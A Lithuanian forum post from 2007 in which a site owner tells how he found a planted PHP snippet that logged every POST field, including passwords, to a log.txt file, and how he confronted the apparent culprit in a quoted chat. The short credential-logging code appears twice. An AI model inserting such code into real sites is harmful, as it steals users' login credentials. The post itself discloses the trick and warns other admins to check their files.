Parašė mXt· 2007 Gru. 31 16:12:19
#1
Taigi papasakosiu trumpą istoriją apie tai, kaip Nepster krečia išdaigas mūsų svetainėse :)
Šiandien savo FTP root direktorijoje užkliuvo už akių log.txt failiukas :) Žvilgtelėjau vidun - ogi užloginti visi prisijungimai :) iš pradžių parašiau Bloodui, kaltindamas jį :D Kaip kaltinimai nepasitvirtino, Bloodas nusprendė man padėti ir prigauti veikėją, kuris logino slaptažodžius :) Po trumpos paieškos aptikome prie vienos panelės prirašytą Nepster braižo kodą:
$handle = fopen("".BASEDIR."log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
kurio pagalba ir buvo loginami slaptažodžiai. Po to dar radome užfiksuota Nepkės IP adresa, taigi kaltininkas buvo greitai nustatytas :) ištrauka iš mano chato su Nepster:
Sitas IP tau kartais nieko neprimena? **.**.**.***
[16:19:02] Nepster sako: nea
[16:19:12] .:Edvinas | mXt:. sako: o sitas kodas?
[16:19:13] .:Edvinas | mXt:. sako: $handle = fopen("".BASEDIR."log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
[16:19:25] Nepster sako: primena
[16:20:46] .:Edvinas | mXt:. sako: nemanai, kad negrazu taip zaisti mano saite?
[16:21:00] Nepster sako: gal biski ir negrazu :)
[16:21:07] .:Edvinas | mXt:. sako: tai ko taip darai?
[16:21:17] Nepster sako: is kur zinai kad as ? :D
[16:21:46] .:Edvinas | mXt:. sako: tavo braizas
[16:21:52] .:Edvinas | mXt:. sako: Tu arba Zilvinas
[16:21:57] .:Edvinas | mXt:. sako: vienas is dvieju
[16:22:41] .:Edvinas | mXt:. sako: Jau pasiseke uzlogint kazka? :D
[16:22:56] Nepster sako: net neziurejau ;]
Taigi Nepsteris pats išsidavė :)
Saugumo dėlei persižiūrėkit ir jūs failus, panelių kodus, ar mūsų draugai nežaidžia ir pas jus :) Gėda, Nepster ;)
Redagavo mXt· 2007 Gru. 31 18:12:32